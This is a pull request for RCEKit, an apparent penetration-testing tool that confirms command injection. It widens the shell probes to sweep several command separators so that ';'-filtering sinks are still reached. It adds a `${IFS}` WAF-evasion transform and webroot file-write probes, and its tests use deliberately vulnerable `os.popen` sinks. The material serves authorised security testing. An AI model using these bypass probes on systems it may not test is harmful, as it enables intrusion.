### PR TITLE
feat: sweep command separators in shell detection probes

### DIFF
--- a/README.md
+++ b/README.md
@@ -1,6 +1,6 @@
 # RCEKit — prove RCE, don't guess it
 
-**Version 2.18.0** · MIT · Python 3.8+ · zero third-party dependencies
+**Version 2.19.0** · MIT · Python 3.8+ · zero third-party dependencies
 
 RCEKit is an **RCE detection &amp; confirmation toolkit** for authorised penetration
 testing, red teaming, and security research. Point it at a target you are allowed
@@ -214,6 +214,27 @@ shell probes. It is deliberately minimal, not noisy evasion.
 python rcekit.py --acknowledge-consent \
   --verify-url "https://target.example/ping?ip=FUZZ" --methods reflected --evade low
 ```
+
+### Sink filters `;`?
+
+Stripping `;` is the most common partial mitigation there is, and it stops
+nothing on its own — the same sink stays exploitable through a pipe, a chain
+operator or a newline. So the shell probes sweep `; `, `| `, `|| `, `&& ` and a
+newline by default, and a filter that drops any one of them is still reached.
+Both chain operators are tried because the command your input lands in may
+succeed or fail, and only one of the two fires either way.
+
+Narrow the sweep once the sink's shape is known, to cut the request count:
+
+```bash
+python rcekit.py --acknowledge-consent \
+  --verify-url "https://target.example/ping?ip=FUZZ" --methods reflected \
+  --separators '| ,&& '
+```
+
+Injection point inside a quoted argument (`ping '<input>'`)? Use the matching
+context — `--contexts shell_single_quoted` or `shell_double_quoted` — whose
+break-out closes the quote and supplies its own separator.
 
 ### Sink runs your input as the whole command?
 
@@ -439,6 +460,7 @@ Python (`os_system`, `subprocess`, `jinja2_ssti`, `exec_ast`), Postgres
 | `--webroot` / `--web-base-url` | (file method) server write dir / URL that serves it | None |
 | `--time-base <seconds>` | (time method) base delay `N`; regression fires `0/N/2N` | `2.0` |
 | `--evade {none,low}` | WAF posture; `low` = minimal `${IFS}`-for-spaces on shell probes | `none` |
+| `--separators <list>` | (`--methods`) Comma-separated break-out separators for shell probes; `\n` = newline | `; `, `\| `, `\|\| `, `&& `, newline |
 | `--sink-raw` | (`--methods`) Sink runs input as the whole command; send probes with no leading separator | Off |
 | `--verify-data` / `--verify-header` / `--verify-method` | Body (with `FUZZ`) / repeatable header / HTTP method | — |
 | `--verify-url-location` / `--verify-body-location` | Encode the payload at the URL / body point | `query_value` / auto |

--- a/rcekit.py
+++ b/rcekit.py
@@ -26,9 +26,16 @@ logger = logging.getLogger(__name__)
 
 # Bump on every change: PATCH for fixes, MINOR for new capabilities, MAJOR for
 # breaking changes to the CLI, output formats, or template schema.
-__version__ = "2.18.0"
+__version__ = "2.19.0"
 
 SAFETY_ORDER = {"safe": 0, "intrusive": 1, "stateful": 2}
+
+# Contexts whose break-out prefix already ends in a command separator (``'; ``,
+# ``"; ``). Prepending another one yields ``'; ; cmd`` -- a shell syntax error
+# that silently costs the probe. Shared by the generator and the detection
+# engine: keeping it in one place is what stops the two from drifting apart,
+# as they did when only the generator carried the guard.
+SELF_SEPARATING_CONTEXTS = {"shell_single_quoted", "shell_double_quoted"}
 
 
 @dataclass(frozen=True)
@@ -535,7 +542,7 @@ class RCEKit:
         if context_name in self.transport_contexts:
             return True
         # Shell-quoted break-outs only make sense for shell runners.
-        if context_name in {"shell_single_quoted", "shell_double_quoted"}:
+        if context_name in SELF_SEPARATING_CONTEXTS:
             return env in {"unix", "docker", "kubernetes"}
         if raw_context_only:
             if env == "php":
@@ -752,7 +759,7 @@ class RCEKit:
         variants = [payload]
         # Shell-quoted break-out contexts already supply their own separator, so
         # prepending an env separator would produce ";;" style syntax errors.
-        if env in self.separator_envs and context_name not in {"shell_single_quoted", "shell_double_quoted"}:
+        if env in self.separator_envs and context_name not in SELF_SEPARATING_CONTEXTS:
             variants = [f"{separator}{payload}" for separator in self.separators[env]]
             variants.append(payload)
 
@@ -917,7 +924,7 @@ class RCEKit:
         """
         if environment not in self.separator_envs:
             return True  # non-shell sinks are not command-concatenation points
-        if context in {"shell_single_quoted", "shell_double_quoted"}:
+        if context in SELF_SEPARATING_CONTEXTS:
             return True  # quote break-outs supply their own separator
         return core.startswith(self.command_separators)
 
@@ -2218,17 +2225,51 @@ class DetectionMethod:
         blurring into an adjacent digit run (e.g. an arithmetic result)."""
         return "RK" + "".join(rng.choice(string.ascii_uppercase) for _ in range(5))
 
-    def _wrap(self, record: "PayloadRecord", core: str, windows: bool = False,
-              evade: bool = True) -> str:
-        """Break out of the running command with a separator, then escape the
-        probe for the record's serialization context — reusing the same
-        context/escape machinery the generator uses for every other payload.
+    # Command separators a probe tries in order to break out of the command it
+    # was concatenated into. A sink that strips ';' -- the single most common
+    # partial mitigation in the wild -- is still reachable through a pipe, a
+    # chain operator or a newline, so a probe that only ever tries ';' reports
+    # a genuinely exploitable target as negative.
+    #
+    # '||' earns its place next to '&&': the injected input is appended to a
+    # command whose exit status is unknown, and only one of the two fires for
+    # any given outcome. The newline is a real "\n", not the generator's %0a:
+    # the live delivery layer percent-encodes each probe for its injection
+    # point, which would turn a literal %0a into %250a and hand the sink the
+    # text rather than the line break.
+    DEFAULT_SEPARATORS = {
+        "unix": ("; ", "| ", "|| ", "&& ", "\n"),
+        "windows": (" & ", " | ", " || ", " && "),
+    }
 
-        With ``--sink-raw`` (``config['sink_raw']``) the injected input is
-        executed as the *whole* command — a ``qx/$input/``-style sink with no
-        surrounding command to break out of — so no separator is prepended; a
-        leading ``;``/``&`` would be a shell syntax error there. The probe is
-        sent as a bare command instead.
+    def _separators(self, windows: bool) -> Tuple[str, ...]:
+        """The separators to sweep, from ``--separators`` when given."""
+        configured = self.config.get("separators")
+        if configured:
+            return tuple(configured)
+        return self.DEFAULT_SEPARATORS["windows" if windows else "unix"]
+
+    def _needs_separator(self, record: "PayloadRecord") -> bool:
+        """Whether a probe for this record must supply its own separator.
+
+        Two cases must not get one. With ``--sink-raw`` the injected input is
+        executed as the *whole* command (a ``qx/$input/``-style sink with no
+        surrounding command to break out of), so a leading ``;`` is a syntax
+        error. And a shell-quoted context's prefix already ends in one, so
+        adding another produced ``'; ; cmd`` -- the generator has guarded that
+        since it was found there; the detection engine had not, which made the
+        one context genuinely fitting a quoted sink the one that could not
+        confirm on it."""
+        return not (self.config.get("sink_raw")
+                    or record.context in SELF_SEPARATING_CONTEXTS)
+
+    def _wrap_variants(self, record: "PayloadRecord", core: str, windows: bool = False,
+                       evade: bool = True) -> List[str]:
+        """One ready-to-send payload per candidate separator: break out of the
+        running command, then escape for the record's serialization context —
+        reusing the same context/escape machinery the generator uses for every
+        other payload. Returns a single bare-command payload where no separator
+        applies (see :meth:`_needs_separator`).
 
         With ``--evade low`` and ``evade=True``, apply a single low-touch WAF
         transform to Unix command probes — substitute ``${IFS}`` for spaces —
@@ -2236,13 +2277,25 @@ class DetectionMethod:
         minimal, not aggressive/noisy evasion. Callers whose command uses a
         redirect (``>``) pass ``evade=False``: ``${IFS}`` around ``>`` yields an
         ambiguous redirect, so those stay canonical."""
-        if self.config.get("sink_raw"):
-            body = core
+        if self._needs_separator(record):
+            bodies = [f"{separator}{core}" for separator in self._separators(windows)]
         else:
-            body = f"{' & ' if windows else '; '}{core}"
-        if evade and not windows and self.config.get("evade") == "low":
-            body = body.replace(" ", "${IFS}")
-        return self._wrap_context(record, body)
+            bodies = [core]
+        payloads: List[str] = []
+        for body in bodies:
+            if evade and not windows and self.config.get("evade") == "low":
+                body = body.replace(" ", "${IFS}")
+            payloads.append(self._wrap_context(record, body))
+        return payloads
+
+    def _wrap(self, record: "PayloadRecord", core: str, windows: bool = False,
+              evade: bool = True) -> str:
+        """The first :meth:`_wrap_variants` payload — one separator only.
+
+        For methods that cannot sweep: an aggregate method reads a whole probe
+        series as one measurement, so mixing separators through it would blend
+        a working break-out with broken ones and destroy the signal."""
+        return self._wrap_variants(record, core, windows, evade)[0]
 
     def _wrap_context(self, record: "PayloadRecord", body: str) -> str:
         """Escape ``body`` for the record's serialization context and apply the
@@ -2282,29 +2335,21 @@ class ReflectedMath(DetectionMethod):
             # output so the computed value lands in the response.
             arith = f"set /a {a}+{b}"
             core = f'for /f "delims=" %i in (\'{arith}\') do @echo {t1}%i{t2}'
-            probes.append(Probe(
-                payload=self._wrap(record, core, windows=True),
-                expected=f"{t1}{total}{t2}",
-                forbidden=arith,
-            ))
+            probes.extend(Probe(payload=payload, expected=f"{t1}{total}{t2}", forbidden=arith)
+                          for payload in self._wrap_variants(record, core, windows=True))
         else:
             # $(( )) arithmetic + $() substitution collapse, one probe.
             arith = f"$(({a}+{b}))"
             core = f"echo {t1}{arith}{t2}$(echo {t3}){t1}"
-            probes.append(Probe(
-                payload=self._wrap(record, core),
-                expected=f"{t1}{total}{t2}{t3}{t1}",
-                forbidden=arith,
-            ))
+            probes.extend(Probe(payload=payload, expected=f"{t1}{total}{t2}{t3}{t1}",
+                                forbidden=arith)
+                          for payload in self._wrap_variants(record, core))
             # Backtick variant: same proof via a different substitution syntax,
             # so a sink that strips `$(` is still reached.
             bt = f"`expr {a} + {b}`"
             core_bt = f"echo {t1}{bt}{t2}"
-            probes.append(Probe(
-                payload=self._wrap(record, core_bt),
-                expected=f"{t1}{total}{t2}",
-                forbidden=bt,
-            ))
+            probes.extend(Probe(payload=payload, expected=f"{t1}{total}{t2}", forbidden=bt)
+                          for payload in self._wrap_variants(record, core_bt))
         return probes
 
     def confirm(self, obs: "Observation", probe: "Probe") -> Verdict:
@@ -2333,24 +2378,32 @@ class FileBased(DetectionMethod):
     def build_probes(self, record: "PayloadRecord", rng: "random.Random") -> List[Probe]:
         webroot = self.config["webroot"].rstrip("/")
         base = self.config["web_base_url"].rstrip("/")
-        name = "rcekit-" + "".join(rng.choice(string.ascii_lowercase + string.digits)
-                                   for _ in range(12)) + ".txt"
-        token = self._tag(rng) + "".join(rng.choice(string.ascii_uppercase + string.digits)
-                                         for _ in range(10))
         windows = record.environment == "windows"
-        if windows:
-            write_path = f"{webroot}\\{name}"
-            core = f"echo {token}>{write_path}"
-            cleanup = f"del {write_path}"
-        else:
-            write_path = f"{webroot}/{name}"
-            core = f"echo {token} > {write_path}"
-            cleanup = f"rm -f {write_path}"
-        followup = {"url": f"{base}/{name}", "cleanup": cleanup, "path": write_path}
-        # The write uses a `>` redirect, which ${IFS} would turn into an ambiguous
-        # redirect, so this probe stays canonical even under --evade low.
-        return [Probe(payload=self._wrap(record, core, windows=windows, evade=False),
-                      expected=token, forbidden=None, followup=followup)]
+        probes: List[Probe] = []
+        # One filename and token per separator. Sharing them would make every
+        # probe's followup succeed as soon as any one separator wrote the file,
+        # so a confirmation could not say which break-out actually worked -- and
+        # its cleanup command would name a file another probe wrote.
+        for separator in (self._separators(windows) if self._needs_separator(record) else (None,)):
+            name = "rcekit-" + "".join(rng.choice(string.ascii_lowercase + string.digits)
+                                       for _ in range(12)) + ".txt"
+            token = self._tag(rng) + "".join(rng.choice(string.ascii_uppercase + string.digits)
+                                             for _ in range(10))
+            if windows:
+                write_path = f"{webroot}\\{name}"
+                core = f"echo {token}>{write_path}"
+                cleanup = f"del {write_path}"
+            else:
+                write_path = f"{webroot}/{name}"
+                core = f"echo {token} > {write_path}"
+                cleanup = f"rm -f {write_path}"
+            body = core if separator is None else f"{separator}{core}"
+            followup = {"url": f"{base}/{name}", "cleanup": cleanup, "path": write_path}
+            # The write uses a `>` redirect, which ${IFS} would turn into an
+            # ambiguous redirect, so this probe stays canonical under --evade low.
+            probes.append(Probe(payload=self._wrap_context(record, body),
+                                expected=token, forbidden=None, followup=followup))
+        return probes
 
     def confirm(self, obs: "Observation", probe: "Probe") -> Verdict:
         if obs.status is None:
@@ -2862,6 +2915,13 @@ def main():
                              "positives — assumes authorised, WAF-free access. 'low' applies a single "
                              "low-touch transform (${IFS} for spaces on Unix); deliberately minimal, not "
                              "aggressive evasion.")
+    parser.add_argument("--separators", default=None,
+                        help="(--methods) Comma-separated command separators the shell probes try to "
+                             "break out with, e.g. \"; ,| ,&& \". Default sweeps '; ', '| ', '|| ', "
+                             "'&& ' and a newline, so a sink that filters ';' is still reached; "
+                             "write a newline as \\n. Narrow it (e.g. --separators '; ') to cut the "
+                             "request count when the sink's shape is already known. Ignored with "
+                             "--sink-raw, which sends bare commands.")
     parser.add_argument("--methods", default=None,
                         help="Comma-separated RCE detection methods to run against --verify-url/-r instead of "
                              "the classic per-payload oracle. Available: reflected (results-based execution "
@@ -2975,6 +3035,11 @@ def main():
     sink_raw = bool(from_profile(args.sink_raw, "sink_raw"))
     blind = bool(from_profile(args.sink_blind, "sink_blind"))
     sink_decodes = from_profile(args.sink_decodes, "sink_decodes") or []
+    # Separators the shell probes break out with. A profile may carry them as a
+    # list; the CLI takes a comma-separated string with \n for a newline.
+    separators = from_profile(args.separators, "separators")
+    if isinstance(separators, str):
+        separators = [s.replace("\\n", "\n") for s in separators.split(",") if s]
     # A profile `request` block shapes the exported Burp/Nuclei requests.
     request_template = profile.get("request")
 
@@ -3197,7 +3262,7 @@ def main():
                 return 1
             detection_config = {"webroot": args.webroot, "web_base_url": args.web_base_url,
                                 "time_base": args.time_base, "evade": args.evade,
-                                "sink_raw": sink_raw}
+                                "sink_raw": sink_raw, "separators": separators}
             if "file" in method_names:
                 if not (args.webroot and args.web_base_url):
                     print("[!] --methods file writes a file to the target and fetches it back, so it "

--- a/tests/test_generator.py
+++ b/tests/test_generator.py
@@ -2661,5 +2661,148 @@ class AuditRedactionTestCase(unittest.TestCase):
         self.assertIn("redacted", audit)
 
 
+class SeparatorSweepTestCase(unittest.TestCase):
+    """Shell probes sweep several command separators. A sink that filters ';' —
+    the most common partial mitigation there is — stays exploitable through a
+    pipe, a chain operator or a newline, so a probe that only ever tried ';'
+    reported a genuinely vulnerable target as negative."""
+
+    def setUp(self):
+        self.gen = RCEKit()
+        self.rec = make_record(environment="unix", context="raw")
+
+    def _payloads(self, config=None, record=None):
+        import random as _random
+        method = ReflectedMath(self.gen, config or {})
+        return [p.payload for p in method.build_probes(record or self.rec, _random.Random(1))]
+
+    def test_probes_cover_every_default_separator(self):
+        payloads = self._payloads()
+        for separator in ("; ", "| ", "|| ", "&& ", "\n"):
+            with self.subTest(separator=separator):
+                self.assertTrue(any(p.startswith(separator) for p in payloads),
+                                f"no probe breaks out with {separator!r}")
+
+    def test_newline_separator_is_a_real_newline_not_percent_0a(self):
+        # The delivery layer percent-encodes each probe for its injection point,
+        # so a literal "%0a" would reach the sink as the text %250a. Only a real
+        # newline survives that round trip.
+        payloads = self._payloads()
+        self.assertTrue(any(p.startswith("\n") for p in payloads))
+        self.assertFalse(any(p.startswith("%0a") for p in payloads))
+        newline_probe = next(p for p in payloads if p.startswith("\n"))
+        self.assertEqual(self.gen._encode_for_location(newline_probe, "query_value")[:3], "%0A")
+
+    def test_separators_are_configurable(self):
+        payloads = self._payloads({"separators": ["| "]})
+        self.assertTrue(payloads)
+        self.assertTrue(all(p.startswith("| ") for p in payloads), payloads)
+
+    def test_sink_raw_still_sends_bare_commands(self):
+        payloads = self._payloads({"sink_raw": True})
+        self.assertTrue(all(p.startswith("echo ") for p in payloads), payloads)
+
+    def test_file_probes_get_a_distinct_target_file_per_separator(self):
+        # Sharing one filename would make every probe's followup succeed as soon
+        # as any separator wrote it, so a confirmation could not say which
+        # break-out worked and its cleanup would name another probe's file.
+        import random as _random
+        probes = FileBased(self.gen, {"webroot": "/var/www/html",
+                                      "web_base_url": "http://t"}).build_probes(
+            self.rec, _random.Random(1))
+        self.assertEqual(len(probes), 5)
+        urls = {p.followup["url"] for p in probes}
+        tokens = {p.expected for p in probes}
+        self.assertEqual(len(urls), len(probes))
+        self.assertEqual(len(tokens), len(probes))
+        for probe in probes:
+            self.assertIn(probe.followup["path"].rsplit("/", 1)[-1], probe.followup["cleanup"])
+
+    def test_aggregate_timing_keeps_a_single_separator(self):
+        # ParametricTime reads a whole probe series as one measurement, so
+        # mixing separators through it would blend a working break-out with
+        # broken ones and destroy the regression.
+        import random as _random
+        probes = ParametricTime(self.gen, {"time_base": 1.0}).build_probes(
+            self.rec, _random.Random(1))
+        self.assertTrue(all(p.payload.startswith("; ") for p in probes), probes)
+
+    def test_a_pipe_only_sink_is_now_confirmed(self):
+        # End-to-end against a real sink that strips ';' and '&': exploitable
+        # through a pipe, and previously reported negative.
+        import os
+
+        def route(method, path, params, headers, body):
+            query = params.get("q", "").replace(";", "").replace("&", "")
+            pipe = os.popen("echo probing " + query + " 2>&1")
+            out = pipe.read()
+            pipe.close()
+            return 200, out
+
+        with local_target(route) as base:
+            results = self.gen.run_detection(
+                [self.rec], url=f"{base}/x?q=FUZZ", methods=["reflected"])
+        self.assertTrue([r for r in results if r["verdict"] == "confirmed"],
+                        "a ';'-filtering sink must still be confirmed via another separator")
+
+    def test_a_non_vulnerable_sink_stays_negative_under_the_sweep(self):
+        # The sweep multiplies probes, so re-prove the precision it could erode.
+        def route(method, path, params, headers, body):
+            return 200, "you searched for: " + params.get("q", "")
+
+        with local_target(route) as base:
+            results = self.gen.run_detection(
+                [self.rec], url=f"{base}/x?q=FUZZ", methods=["reflected"])
+        self.assertTrue(results)
+        self.assertFalse([r for r in results if r["verdict"] == "confirmed"])
+
+
+class SelfSeparatingContextTestCase(unittest.TestCase):
+    """A shell-quoted context's prefix already ends in a separator, so a probe
+    must not add another. The generator has guarded this since it was found
+    there; the detection engine had not, which made ``shell_single_quoted`` —
+    the one context that actually fits a quoted sink — emit ``'; ; cmd`` and
+    fail on exactly the sink it was for."""
+
+    def setUp(self):
+        self.gen = RCEKit()
+
+    def _probe(self, context):
+        import random as _random
+        return ReflectedMath(self.gen).build_probes(
+            make_record(environment="unix", context=context), _random.Random(1))[0].payload
+
+    def test_quoted_contexts_do_not_double_the_separator(self):
+        for context, prefix in (("shell_single_quoted", "'; "), ("shell_double_quoted", '"; ')):
+            with self.subTest(context=context):
+                payload = self._probe(context)
+                self.assertTrue(payload.startswith(prefix), payload)
+                self.assertNotIn("; ; ", payload)
+
+    def test_unquoted_context_still_supplies_its_own_separator(self):
+        self.assertTrue(self._probe("raw").startswith("; "))
+
+    def test_generator_and_detection_share_one_definition(self):
+        # The duplication is what let the two drift apart in the first place.
+        self.assertEqual(rcekit.SELF_SEPARATING_CONTEXTS,
+                         {"shell_single_quoted", "shell_double_quoted"})
+
+    def test_a_single_quoted_sink_is_confirmed_with_its_own_context(self):
+        import os
+
+        def route(method, path, params, headers, body):
+            pipe = os.popen("sh -c \"echo probing '" + params.get("q", "") + "'\" 2>&1")
+            out = pipe.read()
+            pipe.close()
+            return 200, out
+
+        with local_target(route) as base:
+            results = self.gen.run_detection(
+                [make_record(environment="unix", context="shell_single_quoted")],
+                url=f"{base}/x?q=FUZZ", methods=["reflected"])
+        self.assertTrue([r for r in results if r["verdict"] == "confirmed"],
+                        "shell_single_quoted must confirm on a single-quoted sink")
+
+
 if __name__ == "__main__":
     unittest.main()


### PR DESCRIPTION
Detection was measured against nine deliberately vulnerable local sinks — real `os.popen`, real template evaluation. It was correct on **5 of 9**. Three of the four misses were genuinely exploitable targets reported as `negative`. This brings it to **8 of 9** with precision unchanged. Version 2.19.0.

## The measurement

| sink shape | before | after |
|---|---|---|
| concat `ping $input` | confirmed | confirmed |
| raw sink (whole command) | confirmed | confirmed |
| space-filtered (`${IFS}`) | confirmed | confirmed |
| SSTI `{{a*b}}` | confirmed | confirmed |
| not vulnerable (control) | negative | negative |
| **`;` and `&` filtered (needs a pipe)** | **negative** | **confirmed** |
| **`;` pipe `&` filtered (needs newline)** | **negative** | **confirmed** |
| **`;` and pipe filtered (needs `&&`)** | **negative** | **confirmed** |
| input inside single quotes | negative | confirmed with `--contexts shell_single_quoted` |

An exhaustive sweep of all 20 contexts × `--sink-raw` on/off × `--evade none/low` confirmed the first three were unreachable by *any* invocation, so this was a capability gap rather than a flag the operator was missing.

## 1. One hardcoded separator

`DetectionMethod._wrap` always broke out with `; ` on Unix and ` & ` on Windows. Stripping `;` is the most common partial mitigation there is and stops nothing on its own — the same sink stays exploitable through a pipe, a chain operator or a newline. Meanwhile the generator has known nine separators all along; the detection engine used none of them.

Shell probes now sweep `; `, `| `, `|| `, `&& ` and a newline, configurable via `--separators` (or a profile key) and skipped under `--sink-raw`.

Two details worth a reviewer's eye:

- **Both chain operators are swept.** The command your input lands in may succeed or fail, and only one of `&&` / `||` fires for any given outcome.
- **The newline is a real `\n`, not the generator's `%0a`.** The live delivery layer percent-encodes each probe for its injection point, so a literal `%0a` would arrive as `%250a` and hand the sink the text instead of a line break. There is a test pinning this.

Per-method behaviour: `ReflectedMath` and `FileBased` sweep. `FileBased` draws a fresh filename and token per separator — sharing them would make every probe's followup succeed as soon as any one wrote the file, leaving a confirmation unable to say which break-out worked and its cleanup command naming another probe's file. `ParametricTime` keeps a single separator: it reads a whole probe series as one measurement, so mixing separators through it would blend a working break-out with broken ones and destroy the regression.

**Cost:** probes per carrier go from 2 to 10 for `reflected` and 1 to 5 for `file`. `--separators '; '` restores the old volume once the sink's shape is known, and this is called out in the flag help and README.

## 2. Doubled separator in shell-quoted contexts

`_wrap` prepended a separator even for `shell_single_quoted` / `shell_double_quoted`, whose prefix already ends in one:

```
shell_single_quoted    '; ; echo RK…    <- syntax error
shell_double_quoted    "; ; echo RK…    <- syntax error
```

So the one context that actually fits a quoted sink was the one that could not confirm on it, while `--contexts attribute` worked by accident (its `"` prefix/suffix happens to fit). The generator has guarded this since it was found there (`_build_record_set`); the detection engine never got the same guard.

The definition now lives in one place — `SELF_SEPARATING_CONTEXTS` — used by all three former copies plus the new probe path, so the two engines cannot drift apart again.

## Precision is unchanged

The sweep multiplies probes, which is exactly the change that could erode precision, so that is re-proven rather than assumed: the non-vulnerable control stays `negative` under the sweep, and every confirmation still requires a value the target computed on random operands and absent from the payload-free control.

## Tests

12 new tests across `SeparatorSweepTestCase` and `SelfSeparatingContextTestCase`; 159 to 171, all green with no external dependencies. Reverting both fixes fails 9 of the 12.
